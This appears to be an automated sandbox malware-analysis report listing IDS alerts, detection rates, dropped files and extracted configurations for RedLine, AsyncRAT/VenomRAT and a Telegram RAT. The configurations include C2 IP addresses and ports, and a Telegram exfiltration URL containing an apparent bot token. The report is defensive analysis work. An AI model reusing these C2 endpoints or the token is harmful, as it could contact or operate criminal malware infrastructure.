ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:37.292022
SID:	2054071
Source Port:	49878
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:16.276871
SID:	2054071
Source Port:	49949
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:28.711553
SID:	2054071
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 192.3.140.185

Timestamp:	07/06/24-13:27:14.852608
SID:	2054071
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:17.117981
SID:	2054071
Source Port:	49950
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:53.883497
SID:	2054071
Source Port:	49913
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:04.101863
SID:	2054071
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:55.591740
SID:	2054071
Source Port:	49916
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:44.196266
SID:	2054071
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:50.711307
SID:	2054071
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:52.431545
SID:	2054071
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:23.978283
SID:	2054071
Source Port:	49959
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:46.086305
SID:	2054071
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M2 - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	07/06/24-13:27:09.169168
SID:	2054070
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:13.245085
SID:	2054071
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:11.609118
SID:	2054071
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:49.445792
SID:	2054071
Source Port:	49907
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 94.232.249.204 - Destination IP: 192.168.2.4

Timestamp:	07/06/24-13:27:32.441155
SID:	2043234
Source Port:	1912
Destination Port:	49779
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:59.933231
SID:	2054071
Source Port:	49922
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:54.303209
SID:	2054071
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:03.242661
SID:	2054071
Source Port:	49929
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:57.309123
SID:	2054071
Source Port:	49918
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:52.086477
SID:	2054071
Source Port:	49911
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) - Source IP: 94.232.249.204 - Destination IP: 192.168.2.4

Timestamp:	07/06/24-13:27:49.444587
SID:	2030673
Source Port:	7707
Destination Port:	49797
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:27:48.899040
SID:	2054071
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:02.399445
SID:	2054071
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:29:08.461583
SID:	2054071
Source Port:	49941
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:19.823570
SID:	2054071
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 94.232.249.204 - Destination IP: 192.168.2.4

Timestamp:	07/06/24-13:27:37.717270
SID:	2046056
Source Port:	1912
Destination Port:	49779
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:45.914533
SID:	2054071
Source Port:	49900
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	07/06/24-13:28:44.222149
SID:	2054071
Source Port:	49893
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}
Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["{\"result\":200"], "Bot Id": "\"lat\":"}
Source: 4BC4.tmp.Client.exe.7244.10.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendMessage"}

Multi AV Scanner detection for domain / URL

Source: auth.xn--conbase-sfb.xyz

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\KMSAuto\accc.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\KMSAuto\accc.exe	Virustotal: Detection: 56%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	Virustotal: Detection: 54%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Virustotal: Detection: 56%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Virustotal: Detection: 65%	Perma Link

Multi AV Scanner detection for submitted file

Source: xj40xovMsm.exe	ReversingLabs: Detection: 70%
Source: xj40xovMsm.exe	Virustotal: Detection: 36%			Perma Link

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: xj40xovMsm.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: freegeoip.app

Bitcoin Miner

Found strings related to Crypto-Mining

Source: xj40xovMsm.exe	String found in binary or memory: astratum+tcp://us-east.stratum.slushpool.com:3333
Source: xj40xovMsm.exe	String found in binary or memory: astratum+tcp://us-east.stratum.slushpool.com:3333

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3CBD.tmp.Installer.exe.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File created: C:\ProgramData\134349\InstalledSoftware.txt
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File created: C:\Users\user\AppData\Roaming\134349\InstalledSoftware.txt

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49938 version: TLS 1.2

Source: xj40xovMsm.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: ntkrnlmp.pdb3x, source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: costura.dotnetzip.pdb.compressed source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002819000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdbr source: xj40xovMsm.exe
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdb source: xj40xovMsm.exe
Source:	Binary string: costura.dotnetzip.pdb.compressed\|\|\|DotNetZip.pdb\|565BABCBCD978AF66FE1150CC58FDEAFC9815822\|622080 source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
Source:	Binary string: costura.dotnetzip.pdb.compressed`E source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbtmpDx source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: p.pdb.compressed source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed8 source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A187F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	0_2_00007FF68A187F1C
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A184F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	0_2_00007FF68A184F64
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3C6350 lstrcpy,lstrcatA,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcatA,lstrcatA,lstrcpy,lstrcatA,lstrcatA,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,FindNextFileA,	2_2_0F3C6350
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA334F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	47_2_00007FF6AA334F64
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA337F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	47_2_00007FF6AA337F1C
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B07F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	52_2_00007FF7C9B07F1C
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B04F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	52_2_00007FF7C9B04F64
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE484F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	53_2_00007FF7AE484F64
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE487F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	53_2_00007FF7AE487F1C
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C7F1C FindFirstFileW,CopyFileW,RegOpenKeyExW,SetFileAttributesW,FindNextFileW,FindClose,	55_2_00007FF7C07C7F1C
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C4F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	55_2_00007FF7C07C4F64

Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then jmp 0113A28Ah	10_2_0113A057
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then jmp 01135989h	10_2_011356F8
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then jmp 01135F19h	10_2_01135D7D
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then jmp 01134115h	10_2_01133C98
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then inc dword ptr [ebp-24h]	10_2_0113F3C9
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then inc dword ptr [ebp-30h]	10_2_011387D8
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then jmp 05715A2Ah	10_2_05715950
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 4x nop then mov eax, dword ptr [ebp-0Ch]	10_2_057109C8

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2054070 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M2 192.168.2.4:49731 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49734 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49735 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49736 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49739 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49742 -> 64.31.40.18:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49745 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49747 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49750 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49752 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49753 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49760 -> 75.119.203.100:80
Source: Traffic	Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.4:49760 -> 75.119.203.100:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49762 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49762 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49764 -> 192.3.140.185:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49766 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49769 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49770 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49772 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49773 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49775 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49778 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49779 -> 94.232.249.204:1912
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49779 -> 94.232.249.204:1912
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49781 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 94.232.249.204:1912 -> 192.168.2.4:49779
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49782 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49783 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49784 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49785 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49786 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 94.232.249.204:1912 -> 192.168.2.4:49779
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49788 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49789 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49790 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49791 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49792 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49793 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49795 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49796 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49798 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 94.232.249.204:7707 -> 192.168.2.4:49797
Source: Traffic	Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 94.232.249.204:7707 -> 192.168.2.4:49797
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49799 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49800 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49802 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49803 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49804 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49805 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49806 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49807 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49808 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49810 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2054071 ET TROJAN Possible Sniffthem/Tnaket User-Agent Observed M3 192.168.2.4:49812 -> 188.114.96.3:80
